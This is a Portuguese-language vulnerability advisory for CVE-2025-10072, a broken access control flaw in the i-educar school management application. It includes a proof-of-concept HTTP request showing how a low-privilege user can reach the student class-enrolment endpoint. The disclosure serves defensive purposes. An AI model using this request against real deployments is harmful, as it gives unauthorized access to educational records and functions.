Featured image of post CVE-2025-10072
Controle De Acesso Quebrado Moderado I-Educar Securança WebApp

CVE-2025-10072

Controle de Acesso Quebrado

CVE-2025-10072: Controle de Acesso Quebrado no Endpoint /matricula/[ID_STUDENT]/enturmar/[ID_CLASS]

CVE Publication: https://www.cve.org/CVERecord?id=CVE-2025-10072

Resumo

Uma vulnerabilidade de Controle de Acesso Quebrado foi identificada no endpoint /matricula/[ID_STUDENT]/enturmar/[ID_CLASS] do aplicativo i-educar. Essa vulnerabilidade permite que usuários sem as devidas permissões acessem funcionalidades restritas, ignorando as verificações de autorização.

Detalhes

Endpoint Vulnerável: GET /matricula/[ID_STUDENT]/enturmar/[ID_CLASS]
Autenticação: Obrigatória

O aplicativo não consegue validar corretamente as permissões do usuário antes de conceder acesso a este endpoint. Como resultado, até mesmo usuários com privilégios baixos podem acessar com sucesso a funcionalidade destinada apenas a .

PoC

  • Autenticar como um usuário sem privilégios.

  • Enviar a seguinte solicitação:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15

GET /matricula/206/enturmar/23 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br, zstd
Connection: keep-alive
Referer: http://localhost/intranet/educar_matricula_turma_lst.php?ref_cod_matricula=206&ano_letivo=2025
Cookie: i_educar_session=Mz9IKWGOP641g4BLkSGRnxs69wk4ChmUUxUerX19
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i

  • Podemos observar que temos acesso à página e à função de cadastrar alunos nas turmas. E este usuário não deveria fazer isso.

Impacto

Vulnerabilidades de Controle de Acesso Quebrado podem ter consequências graves, incluindo:

  • Acesso não autorizado a funcionalidades restritas;
  • Escalonamento de privilégios para usuários de baixo nível;
  • Exposição de dados sensíveis e potencial comprometimento do sistema;
  • Perda de confidencialidade e integridade de registros educacionais;
  • Danos à reputação da organização.

Referência

https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10072.md

Finder

Marcelo Queiroz

Por: CVE-Hunters

© 2020 - 2025 CVE-Hunters
Built with Hugo
Theme Stack designed by Jimmy